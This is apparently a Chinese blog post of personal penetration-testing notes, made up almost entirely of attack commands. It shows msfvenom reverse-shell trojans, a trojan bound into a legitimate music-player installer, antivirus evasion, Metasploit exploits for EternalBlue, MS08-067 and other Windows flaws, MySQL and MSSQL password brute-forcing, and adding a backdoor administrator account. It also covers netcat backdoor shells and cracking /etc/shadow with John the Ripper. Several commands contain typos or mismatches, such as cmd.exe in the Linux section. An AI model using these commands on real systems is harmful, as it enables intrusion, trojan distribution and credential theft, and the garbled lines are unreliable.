興趣之滲透測試學習

一、msf框架
1、
生成木馬程序: msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘0x00’ LHOST=192.168.123.126 LPORT=5555 -f exe > asd.exe
進入程序:msfconsole
使用handler模塊:use exploit/multi/handler
設置PAYLOAD:set PAYLOAD windows/meterpreter/reverse_tcp
設置控制端ip和端口:set lhost
set lport
攻擊:exploit

2、正常軟件綁定木馬程序
生成木馬:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.126 lport=5555 -x 網易雲音樂.exe -k -f exe -o 網易雲音樂.exe

3、殺毒軟件免殺木馬程序
生成木馬:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -x calc.exe lhost=192.168.123.126 lport=444 -f exe -o calc2.exe
加殼算法:upx -5 calc2.exe

4、永恆之藍
查找永恆之藍模塊:search ms17_010
使用漏洞攻擊模塊: use exploit/windows/smb/ms17_010_eternalblue

設置payload:set payload windows/x64/meterpreter/reverse_tcp
設置目標機ip地址和本地地址

5、MS08_067對winXP
查找模塊:search MS08_067
使用漏洞攻擊模塊: use exploit/windows/smb/MS08_067_netapi
設置payload:set payload windows/shell/reverse_tcp
show options
設置目標機ip地址和本地地址
show targets設置攻擊目標系統set target id

6、ms10-046攻擊winXP
查找漏洞:search ms10-046;
選擇模塊:use exploit/windows/browser/ms10-046_shortcut_icon_dllloader;
設置反彈回來:set payload windows/meterpreter/reverse_tcp
查看需要設置那些參數:show options;
只需設置自己ip;
攻擊exploit生成共享鏈接;
查看會話:sessions -l;
選擇會話:sessions -i 1;

7、ms12-020藍屏攻擊
查找漏洞:search ms12-020;
選擇模塊:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;
設置反彈回來:set payload windows/meterpreter/reverse_tcp
查看需要設置那些參數:show options;
設置對方ip-rhost;
攻擊exploit生成共享鏈接;
查看會話:sessions -l;
選擇會話:sessions -i 1;

8、破解mysql口令
掃描:
查找漏洞:search mysql_version;
選擇模塊:use auxiliary/scaner/mysql/mysql_version;
查看需要設置那些參數:show option;
設置對方ip地址範圍;
設置線程;

破解:
查 找漏洞:search mysql_login;
選擇模塊:use auxiliary/scaner/mysql/mysql_login ;
查看需要設置的參數:show options;
設置密碼文件;
設置用戶文件;
設置線程;
設置rhost;
run;

9、搭建mssql數據庫

10、msf框架破解msspl數據庫弱口令
掃描:
①nmap -sV 192.168.123.14
②msf:
search mssal_ping;
use auxiliary/scanner/mssql/mssql_ping;
set rhost;
run;
暴力破解:
search mssql_login;
use auxiliary/scaner/mssql/mssql_login;
set usernamer sa;
set pass_file /root/passwd.txt//指定密碼字典文件
set threads 5 //設置線程
set rhost 192.168..;//設置對方ip地址
set rport *; //設置對方端口
run;

後滲透:
search mssql_exec;
use…;
show options;
set CMD cmd.exec /c ;
run;
set CMD cmd.exe /c net user demouuser 123456 /add&net localgroup administrator demouser /add; //添加用戶
run;//執行

11、linux版本:netCat通信和返回shell(瑞士軍刀)
服務器:nc -l -p 4444;
客戶端:nc ip地址 端口;

返回shell :nc -l -p 4444 -e cmd.exe

12、使用netCat在被控window計算機建立後門
①、監聽型控制win10並提權
a、cmd操作運行nc.exe -l -p 4444 -e cmd.exe
b、客戶端Linux: nc IP地址 端口
②、自動連接型
a、 linux: nc -l -p 4444
b、win10: nc.exe ip 端口 -e cmd.exe

13、使用netCat在被控linux計算機建立後門
①、監聽型控制linux1並提權
a、cmd操作運行nc.exe -l -p 4444 -e /bin/bash
b、客戶端Linux2: nc IP地址 端口
②、自動連接型
a、 linux1: nc -l -p 4444
b、linux2: nc.exe ip 端口 -e cmd.exe

14、John the ripper暴力破解密碼
①整合密碼文件:unshadow /etc/passwd /etc/shadow > test_passwd
②查找自帶字典文件:cat /user/share/jphn/password.lst
③添加密碼
④john (可以指定字典文件的路徑) test_passwd

15、crunch自定義生成密碼字典文件
crunch 2 3 123
touch /tmp/passwd.txt
crunch 2 3 abc >> /tmp/passwd.txt

16、Nessus主機漏洞掃描工具配置
安裝Nessus、開啓服務、通過鏈接配置

17、linux安裝鍾道之眼

18、httrack 網站克隆工具
可以實現離線瀏覽網頁

19、使用搜索引擎實現被動信息蒐集
https://www.toutiao.com/c/user/110503190700/#mid=1630059338802187

搜索網站登錄後臺
後臺管理 inurl:admin

查詢標題和url含有指定詞彙的結果
intitle:黑客 inurl:hacker

site:toutiao.com //搜索網站子域名

20、Fping 進行主機掃描
fping -g 192.168.0.100 192.168.0.120 //範圍掃描

-a 顯示存活主機
-f 導入ip文件
-l 循環模式

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章